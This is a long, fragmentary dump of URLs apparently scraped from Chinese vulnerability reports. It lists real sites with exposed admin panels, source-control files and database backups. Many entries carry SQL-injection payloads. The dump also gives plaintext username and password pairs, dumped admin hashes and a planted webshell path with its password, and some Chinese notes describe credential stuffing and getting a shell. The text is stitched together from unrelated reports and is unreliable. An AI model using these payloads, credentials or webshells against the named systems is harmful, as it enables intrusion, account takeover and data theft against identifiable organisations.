http://**.**.**.**/zongwu/zwc/fx/admin/login.php http://**.**.**.**/index/zxgkjjshow.asp?key=教学快报&id=321 http://**.**.**.**/index/imageshow.asp?id=24 http://**.**.**.**/asp/xinxidetail.asp?ID=656 http://**.**.**.**/index/admin/admin_login.asp http://**.**.**.**/zdsys/admin/admin.asp http://**.**.**.**/asp/bylw/cx.asp http://**.**.**.**/asp/admin.asp http://**.**.**.**/admin/index.php http://**.**.**.**/xg http://**.**.**.** http://**.**.**.**账号mpacc密码a111111 http://**.**.**.**/sklab账号xsun密码a222222 http://**.**.**.**/wylab用户wylab密码a222222 http://**.**.**.**/cxcy账号xxzz密码a222222 http://**.**.**.**/chlab账号qjzlab密码a11111 http://**.**.**.**/yjsjy账号lixiu密码a111111 http://**.**.**.**账号ngw密码888888 http://**.**.**.**账号houhx密码a11111 http://**.**.**.**/syzx账号zhaochq密码zcq1701 http://m.**.**.**.**/jump?u=http://**.**.**.**/&m=853640 http://m.**.**.**.**/jump?u= http://**.**.**.**/&m=853640“ http://**.**.**.**/index.html,点击图中标识链接 http://**.**.**.**:58083/siat-web/login/ssoLogin.action?Corp_ID=XMN298&MODULE=XMN298_inter.htm&gs=**.**.**.**存在命令执行漏洞 http://edu.cmbc.com.cn/pxindex/login.action)测试发现有验证码 http://edu.cmbc.com.cn/cas/login)抓包如下: http://edu.cmbc.com.cn/cas/login?service= http://wooyun.org/bugs/wooyun-2015-0148614 http://www.moretv.com.cn/.git/config https://120.132.60.26-- https://account.moretv.com.cn/ http://www.xibao360.com/ http://121.40.212.164/search/?q=1 http://**.**.**.**/sungirlbaby.sql https://sslvpn.faw.com.cn http://10.7.80.42:8080/cxm_new_old.jsp?new_code=wwwww&old_code=eeeeeeee http://www.thegitc.com/index.php/home/index/getPersonnelDetailed?id=5 http://www.thegitc.com/index.php/home/index/getNewsDetailed?id=176 http://**.**.**.** http://**.**.**.**/em/externalnetwork/personalInfoEntry.jsp http://**.**.**.**/bugs/wooyun-2010-07101 https://m.jindanlicai.com/apitwo/get_h5?view&pageName=settings/changecard&requestData={"status":3,"token":"f6c946370fe7b9c7f6048eaa753129c3","u_id":"535737 https://**.**.**.**/pukingli/lihongtu/blob/826470c915944a8e45c1ed215bdf8aad71e603e0/CIP2Project/Interface/WebApp/XmlModel/ConstParams.xml http://**.**.**.**/FrontFrame/ http://**.**.**.**/uploadfiles/ http://**.**.**.**/zcfg/ http://**.**.**.**/js/ http://**.**.**.**/admin/ http://**.**.**.**/css/ http://**.**.**.**/include/ http://**.**.**.**/doc http://**.**.**.**/xw/ http://**.**.**.**/bugs/wooyun-2010-0126808 http://daimayi.com/index.php/Loan/index/it_id/2* http://service.hundsun.com http://admin.rinhoo.com/admin/main.php seller.jinri.cn/test/ seller.jinri.cn/test/ portal.jinri.cn/portal.jinri.cn/ http://youxi.wasu.cn/offical.php?action=news_content&cid=724&tpl=mhj http://www.anbanghuwei.com:8000/seeyon/index.jsp http://www.anbanghuwei.com:8000/seeyon/logs/ctp.log http://**.**.**.**/ http://**.**.**.**/zcms/ http://**.**.**.**/ProductDetails.aspx?ProductID=9&from=2&tid=1 http://**.**.**.**/manage/login.html http://**.**.**.**/companycategory/?Command=Index&company_category_no=141 http://**.**.**.**/companycategory/?Command=Index&company_category_no=141 http://**.**.**.**/news/detail.asp?ID=20150507171034 http://**.**.**.**/news/detail.asp?ID=20150507171034 http://www.meilishuo.com/helpcenter/search/?title=hello http://61.135.152.231/webtrans/index.php?controller=user&action=login http://61.135.152.231/SetTime/index.php?time=%27set%7cset%26set%27 http://61.135.152.231/webbak/template/1.php encap:Ethernet c4:7a:08:7c:7c addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224 ec4:7aff:fe08:7c7c/64 Scope:Link MTU:1500 packets:5017795 packets:2704480 txqueuelen:1000 http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0 http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0 http://218.17.149.243:4567/manage/login.html css.hisense.com/HXCSS http://smfl.cn http://www.cpde.ecnu.edu.cn www.cpde.ecnu.edu.cn http://106.39.36.80:10007/File/2015/ http://www.nandaihe123.com/family/family_show.php?id=76 http://www.nandaihe123.com/family/family_show.php?id=76 http://**.**.**.**/hotel.asp?hid=11&lb=kf http://**.**.**.**/hotel.asp?hid=11&lb=kf http://supports.jiaju.sina.com.cn/api/weibo.php?action=send&type=1&content= http://supports.jiaju.sina.com.cn/api/weibo.php?action=send&type=1&content=%E6%88%91%E6%98%AF%E4%B8%80%E5%8F%AA%E7%8C%AA%EF%BC%9Fhttp://t.cn/RUouNyF%20%20%20%20@ringzero%20&callback=jsonp1446827400881 http://jitochina.com/jitochina.rar https://sms-api.luosimao.com/v1/send.json http://www.kuaidi100.com/poll http://biolab.ecnu.edu.cn/admin/sydetail/index2.asp?id=103&ProjectID=X00099 http://jingjia.ecnu.edu.cn Able.Acc2.Web/Page_TeachFiles.aspx http://able.ecnu.edu.cn http://**.**.**.**/cms/member/login.jsp http://www.rycard.com/list.php?catid=35&gid=0&cid=1&tid=3* http://**.**.**.**/plugins/book/1/index.jsp?parentID=500020 http://**.**.**.**/article-exp.php?category=10 http://**.**.**.**/article-exp.php?category=10%20and%20length%28user%28%29%29=17 http://gitlab.mindai.com:1080/script http://qinzhu.ecnu.edu.cn/department/HeartRoom/HeartFront/introduce.aspx?style=%C1%AA%CF%B5%CE%D2%C3%C7&type=%BC%F2%BD%E9 http://www.hy.zjut.edu.cn/ListArticle.aspx?keyword=1&select=http://www.zskjj.gov.cn/&sou=1&tid=1001 http://fw.qm.cn/newslook.asp?leibie=3&id=-1 http://119.15.138.51:80/.svn/entries https://www.ohwyaa.com https://portal.neusoft.com http://**.**.**.**/perform_qpdj2.aspx?jw=280.00&m=0.23174629407003522&vM_ycbh=*&ycsj=2015/12/29 admin:admin http://**.**.**.**:8077/ http://www.willshop.cn/productdetail.php?id=822 http://www.willshop.cn/productdetail.php?id=822 http://jfcc.faw.com.cn/pub_yz.jsp http://jfcc.faw.com.cn http://**.**.**.**/member_lookorder.asp?oid=555 http://**.**.**.**/member_order.asp?type=del&id=554 http://**.**.**.**:16929/SelfOpenAccount/firmController.fir?funcflg=getBrokerList&areaId=45 http://**.**.**.**/ http://**.**.**.**/ http://www.qks.zjut.edu.cn/ShowSinglePageAction.do?singlepageID=35 inurl:webquery_login.asp http://**.**.**.** http://**.**.**.**/bugs/wooyun-2010-077489 https://**.**.**.**/cgi-bin/madmin.cgi https://**.**.**.**/cgi-bin/madmin.cgi http://loginvpc.baijiahulian.com/ http://**.**.**.**/phpcms/modules/video/templates/video_stats_init.tpl.php www.hotwater.com.cn http://www.hotwater.com.cn/project_index.aspx www.hotwater.com.cn http://**.**.**.**/bugs/wooyun-2010-0105315 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ https://**.**.**.**/owa/auth/logon.aspx http://fx1.zgdygf.com/ http://**.**.**.**/web4/findmm.asp^action=find&B1=提交&__EVENTVALIDATION=/wEWBALjoKqRBgL3qvuWAgKF6q0rAt7v5u0M6X2eNnMBcge+ZiVOwRwCJigxFWk=&sfzh=99999999 http://gdiv.sdu.edu.cn:8080/ cn:8080 http://oa.yonho.com/yyoa/index.jsp,这里可用常用用户名和弱口令123456撞库获取7个账号,登陆后可查看公司通讯录,查看办理事宜,可上传脚本。 http://oa.yonho.com/yyoa/common/js/menu/test.jsp?doType=101&S1=;任意执行SQL语句,dbs权限,可getshell。 http://**.**.**.**/smkx/newsopen.php?id=184 http://www.soft.zjut.edu.cn www.soft.zjut.edu.cn http://**.**.**.**/sri/htm/news_show.asp?id=110 http://**.**.**.**/sri/htm/news_show.asp?id=110 http://www.freshman.fudan.edu.cn www.freshman.fudan.edu.cn http://www.17ugo.com/brand_com.php?id=1049&page=2 http://alumni1.xmu.edu.cn/Enrol.aspx http://alumni1.xmu.edu.cn/Assoc/AssocQuery.aspx www.sinoflt.com http://**.**.**.**/oa/default.asp http://**.**.**.**/c/about_mgt_details.php?id=12097 http://ime.xmu.edu.cn/facilityfile.asp?id=11 http://**.**.**.**/english/products/products.asp?leibieid=APIs http://**.**.**.**/products/products.asp?leibieid=APIs&page_no=2 http://**.**.**.**/simcere.rar www.dfsszc.com http://ci.hotwater.com.cn//ci/apps/sys/AccountAction.do?method=selectEmpInfoById&emp_Id=lin www.dfsszc.com http://**.**.**.**/news.asp?sort_name_id=345&Page=2&title=%B1%BE%D5%BE%D0%C2%CE%C5 http://training.transn.com/training/wcat/app/index.php?task_id=350be7ed-48a5-91b6-92be-54bb07ba2474 http://**.**.**.**/mmcnews/latest.php?sortid=-1+OR+17-7%3d10 http://**.**.**.**/class.asp?cn=%B6%BE%C6%B7%D6%AA%CA%B6 http://**.**.**.**/ www.51zxw.net/netclass/zl.asp?icid=40 www.51zxw.net/kq/order_v.asp http://tac.ruijie.com.cn/ http://cogsci.xmu.edu.cn/ http://cogsci.xmu.edu.cn/back.rar http://127.0.0.1 http://127.0.0.1 http://cogsci.xmu.edu.cn/a/ http://**.**.**.**/)四处POST型SQL注入。 http://zhongyi.ifeng.com/bianmi/i.aspx http://m.51piao.com/Ticket/TicketList.aspx?Name=1&Source=key http://jyzd.xmu.edu.cn/guestbook.asp http://jyzd.xmu.edu.cn/guestbook.asp data:text/html;base64,PHNjcmlwdD5hbGVydCgiYnkgeW9uZ3NoYW8iKTwvc2NyaXB0Pg== http://so.aipai.com/clickheat/.svn/entries http://**.**.**.**/site3/index.php http://**.**.**.**/admin/ http://**.**.**.**/admin/land.php http://**.**.**.**/admin/login.php http://**.**.**.**/admin/upload.php http://**.**.**.**:7001/defaultroot/login.jsp http://xxx/xxgk/jcms_files/jcms1/web1/site/zfxxgk/ysqgk/que_code.jsp,que_code.jsp代码如下: http://**.**.**.**/bugs/wooyun-2014-070117 inurl:/custom/GroupNewsList.aspx http://xxx/library/editornew/Editor/temp.asp http://passport.liba.com/login.htm这个好像就是主站的登录的接口,一开始没有验证码限制的,登录一定错误次数之后验证码就出来了额: http://**.**.**.**/seeyon/ http://euniv.zte.com.cn/ http://**.**.**.**/case_enterprise.html http://**.**.**.**/case_college.html http://**.**.**.**/case_government.html http://**.**.**.**:8080/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**:8080/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://volvo.infolearning.so/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/kl/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/gsedu_admin/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://chrysler.infolearning.so//site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**:8080/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**:8080/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://**.**.**.**/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://h.kuwo.cn/hsy/hz/HzWdjNewsDetail?id=14384 http://corp.octmami.com/ajax_video.php?now_video=8'&type=no_type×=0.1655799720901996&_=1445346057351 http://corp.octmami.com/ajax_video.php?now_video=8&type=no_type'×=0.1655799720901996&_=1445346057351 http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User-- http://**.**.**.**/sjk/yxzl/view.asp?ArticleID=6451 http://www.123gps.com.cn/GPSLogin/login.jsp http://**.**.**.**/tesekecheng/index.php/player_tsjy?c_id=1&id=1&PHPSESSID=mnjc6j2e3sh635v2oiphk035d6 http://**.**.**.**/tesekecheng/index.php/player_tsjy?c_id=1&id=1&PHPSESSID=mnjc6j2e3sh635v2oiphk035d6 http://**.**.**.**/member/member.php?username=admin(这个phpcms2007的漏洞,古董) http://**.**.**.**/wooyun.php http://180.168.26.117:8000/8crm/login.php?msg=1 http://jyzd.xmu.edu.cn/dd.rar http://xmubs.xmu.edu.cn/data.rar http://wszg.xmu.edu.cn/admin.rar http://liuxue.xmu.edu.cn/SqlIn.mdb http://cflc.xmu.edu.cn/111.rar http://cflc.xmu.edu.cn/database/PowerEasy2006.mdb http://cflc.xmu.edu.cn/database/SiteWeaver6.5.mdb http://cflc.xmu.edu.cn/temp/PE_TemplateProject.mdb http://phi.xmu.edu.cn/Database/SiteWeaver.mdb http://careersm2.xmu.edu.cn/edit/db/ewebeditor.mdb http://rwxy.xmu.edu.cn/Database/SiteWeaver.mdb http://rwxy.xmu.edu.cn/database/SiteWeaver.mdb http://rwxy.xmu.edu.cn/temp/PE_TemplateProject.mdb http://pmee.xmu.edu.cn/www.rar http://jyzd.xmu.edu.cn/dd.rar http://bst.xmu.edu.cn/KS_Data/KesionCMS7.mdb http://phi.xmu.edu.cn/Database/SiteWeaver.mdb https://**.**.**.** https://**.**.**.** http://info.tcl.com/ http://**.**.**.**/htgl/wzht/mbgl/mbedit.aspx?id=156 http://**.**.**.**/htgl/template/person/csrc/1.aspx http://www.ukimami.com/classroom-uki.php?page=21&item=15 http://www.ukimami.com/product.php?m=product_list&category=10 www.ukimami.com/ajax_product.php?tid=364|10&time=0.7562016532756388 http://**.**.**.**/phpMyAdmin/index.php http://**.**.**.**/phpinfo.php http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**//corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://www.0398.info/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**//corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://www.europe.ren//corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**//corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60 http://**.**.**.**/aspx/ShowRes.aspx?GUID=* http://**.**.**.**/index.php?cmd=aboutUs,如图所示: http://**.**.**.**/index.php?cmd=detail&categoryID=2&publishDate=2014-08-13链接放入sqlmap检测,发现存在注入,如图所示: http://**.**.**.**/index.php?cmd=detail&categoryID=2&publishDate=2014-08-13 http://**.**.**.**/login.php http://**.**.**.**/cl/detail.asp?bigid=11 http://**.**.**.**/info_show.asp?id=31&bigid=5&smallid=16 http://**.**.**.**/alistclass.asp?id=1 http://**.**.**.**/newshow.asp?id=271&mnid=5128%20and%201=1 http://58.83.197.29/zabbix/ http://wooyun.org/bugs/wooyun-2010-066390 http://**.**.**.**/news_page.asp?id=189 http://27.115.100.242/wap/detail/index?goods=2926 http://st.octmami.com/wap/detail/index?goods=2926 http://manage.st.octmami.com/wap/detail/index?goods=2926 http://svn.octmami.com/wap/detail/index?goods=2926 http://test2.st.octmami.com/wap/detail/index?goods=2926 http://test.st.octmami.com/wap/detail/index?goods=2926 http://t.st.octmami.com/wap/detail/index?goods=2926 http://dev.st.octmami.com/wap/detail/index?goods=2926 http://1.st.octmami.com/wap/detail/index?goods=2926 http://3.st.octmami.com/wap/detail/index?goods=2926 http://s2.st.octmami.com/wap/detail/index?goods=2926 http://st.octmami.com/wap/detail/index?goods=2926 http://202.98.11.185/index.jsp http://www.qks.zjut.edu.cn/admin/Login.do http://www.qks.zjut.edu.cn/gdxsqks/ShowSinglePageAction.do?singlepageID=2,singlepageID参数延时注入 http://www.qks.zjut.edu.cn/Login.do http://www.qks.zjut.edu.cn/ShowSinglePageAction.do?singlepageID=35,singlepageID参数延时注入 https://nav.yhqh.com.cn/.svn/entries http://oa.yhqh.com.cn:8888/weaver/weaver.email.FileDownloadLocation?download=1&fileid=1 http://60.10.8.78/LoginUser http://60.10.8.78 http://www.juran.com.cn/News/NewsList.aspx http://www.jgxy.zjut.edu.cn/info/about*-1.html http://www.metro.com/account/addresslist.aspx?operation=delete&ContactorID= http://uc.danlan.org/admin.php http://www.mba.zjut.edu.cn/cymba/show.php?id=2152 www.rdjt.zjut.edu.cn http://xmsstst1.sinochem.com/vendorlogin.aspx http://**.**.**.**/cct/otherView.asp?id=189 http://tw.codoon.com/.svn/entries http://stat.codoon.com/index http://**.**.**.**/phpmyadmin http://**.**.**.**/jjhs中 http://**.**.**.**/web.zip http://**.**.**.**/rwxy/teachersinfo.php?id=32+and+1=2 http://**.**.**.**/pma/ http://**.**.**.**:8080/admin/login.aspx http://**.**.**.**/sofpro/ext_researchmanage/search1.jsp?code_name=qianj&keyword= http://202.102.62.84:81/infoweb/ http://202.102.62.84:81/phpmyadmin/ http://**.**.**.**/rtidcrm-clientweb/npage/obim/staff/loginmng/initLogin.do http://pl.fh21.com.cn/detail.php?id=876&site=&table=hospital http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://www.**.**.**.**/sitefiles/Module/Space/Files/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**//livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://**.**.**.**/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20@@version%3E0-- http://120.35.11.138:81 http://120.35.11.138:88 http://120.35.11.138:8080 http://sjmember.feiniu.com/static/html/login.html http://sjmember.feiniu.com http://wl.tudou.com/wl_report/adminUser/wlReportUserlogin.do www.cfb88.com www.cfb88.com http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/web/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://www.kinglin.co/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://www.ruize.info/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/china/index.php?language_id=1&is_protect=1&action=test http://**.**.**.**/index.php?language_id=1&is_protect=1&action=test http://www.chaorenpaotui.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23 admin:7c6ff7a20019e54878e0 chaorenpaotui:3a5fdc8a052a2441e51e http://www.chaorenpaotui.cn/uploads/allimg/131111/1-131111202436464.php,密码chaoren http://gift.airchina.com.cn/ http://**.**.**.**/hsislyweb/query/queryjindu.hsis?name= http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/admin/用户名密码都是1 